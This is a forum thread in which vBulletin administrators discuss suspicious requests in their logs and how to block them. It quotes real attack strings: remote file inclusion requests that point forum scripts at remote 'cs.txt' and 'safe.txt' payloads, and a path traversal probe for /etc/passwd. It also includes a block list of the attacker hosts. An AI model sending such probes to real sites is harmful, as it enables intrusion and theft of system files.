Announcement

Collapse
No announcement yet.

Strange Spider!

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Strange Spider!

    I cought a spider name itself wget spider and it was crawling this page in my forum: /forum/showthread.php?t=http://ninaru.hut2.ru/images/cs.txt?

    Its user-agent is: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

    Its IP is: 75.136.128.168

    IP resolving gives: 75-136-128-168.dhcp.gnvl.sc.charter.com

    Did you experience anything like this?
    Syrian Medical Society - mi la do - My Hacks - vCharset converter - Projects Queue

    I want to breathe the freedom, and to strew the mounts of nostalgia in your eyes.

  • #2
    It's trying to exploit vBulletin. Don't worry, it can't do it that way(I asked Zachery about it).

    Comment


    • #3
      We've been getting several of those every day! The IP always changes, but all the URLs are similar. Here's a site that logs attacks, you can see more like it:

      http://security.pigstye.net/staticpages/index.php/index

      They can't get in, but I put the following words in our Censored Words list just to be on the safe side.

      {ninaru} {hut2} {ru} {amyru} {h18} {kaos} {r57} {amygirl}

      Comment


      • #4
        wget is (if you didn't already know) a linux download program.
        such as: wget http://path.to/site/file.name
        So I think they were trying to download your showthread.php somehow but failed?

        Comment


        • #5
          I get tons of them. They haven't done anything so far but I'd still wish they'd go away, their long URLs stretch the "Who is online?" page.

          Location:
          /index.php//vb/faq?cmd=http://someurl.de/img/safe.txt? or /index.php//vb/faq?remote=http://someurl.de/img/safe.txt?
          Agent: libwww-perl/5.805

          Is it trying to exploit the forum through the FAQ?
          *Insert text here* :)

          Comment


          • #6
            Originally posted by zappsan View Post
            I get tons of them. They haven't done anything so far but I'd still wish they'd go away, their long URLs stretch the "Who is online?" page.

            Location:
            /index.php//vb/faq?cmd=http://someurl.de/img/safe.txt? or /index.php//vb/faq?remote=http://someurl.de/img/safe.txt?
            Agent: libwww-perl/5.805

            Is it trying to exploit the forum through the FAQ?
            looks like it.

            Comment


            • #7
              any updates on this...?

              Comment


              • #8
                I got a

                showthread.php?t=../../../../../../../etc/passwd

                one of these days :P
                Radio and TV Player for vBulletin

                Comment


                • #9
                  In my logs I see this:

                  [27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

                  Please advise what to do...

                  Comment


                  • #10
                    ^I get that one a lot, it doesn't really seem to do anything...
                    *Insert text here* :)

                    Comment


                    • #11
                      These are called site rippers. They could be harmful in many ways. While vBulletin is immune against such kind of attacks, other uses of these rippers is performing DoS attacks by consuming bandwidth via huge number of requests to the server. They could be blocked all by adding them to your domain's .htaccess file. Check this guide for details.
                      You're spending millions of dollars on a website?!

                      Comment


                      • #12
                        thanks simsim,

                        According to theplanet security department this is

                        " is an example of a malicious file being inserted into your content - cs.txt"

                        he was referring to:

                        grep =http /usr/local/apache/domlogs/* | grep txt

                        [27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

                        I am really concerned about this as I have heard differing views. Does this mean my server is compromised or the vbulletin is compromised? Is there a fix for this?

                        Please advise...

                        Thanks

                        Comment


                        • #13
                          Tonight i saw them in the forums before they would be in the homepage of my site. I got about 15 web addresses this time around.
                          Arcade.gs Game Site!

                          Comment


                          • #14
                            As simsim says, these are (very old) kiddie scripts that attempt to exploit a loophole that was inherent in very early versions of BB/forum and/or chat software applications. Basically, the way old parsers used to work was that anything after the URL (php, asp etc) is effectively a parameter list and browsers/applications used to follow these as an execute command. So for instance, if the tagged parameter to a GET was an off-site command list, then the server would attempt to execute it, thus running malicious commands.

                            As has been said though, the more recent applications take the GET parameter lines as literals (which is why, when developing, it is SOOOO important to ensure that your code correctly and safely parses the GET parameters!!), so consequently the error message is displayed and it goes no further.

                            It is certainly a bandwidth annoyance, but the more crucial issue about these scripts is that they are run by zombie computers that have already been infected by visiting sites that download malware (generally pr0n or warez sites), and are done in the background without the user's knowledge. These are then used by botmasters to effect DDOS attacks. I've compared many of these script IPs wth those logged during very strong DDOS attacks in the past, and the lists are frighteningly exact in their comparisons.

                            Of course I place IP bans on them; my htaccess file is currently hitting around 35K, and I expect it to go much higher. I've set my 403.shtml file to explain why it's likely an IP number has been banned, and outlined the steps to take to clean their computer. They can then send an email (appropriately formatted) to me with the results of their anti-virus report and I would then, if I'm convinced, remove the block on the IP.

                            Comment


                            • #15
                              If its that bad then bann it

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X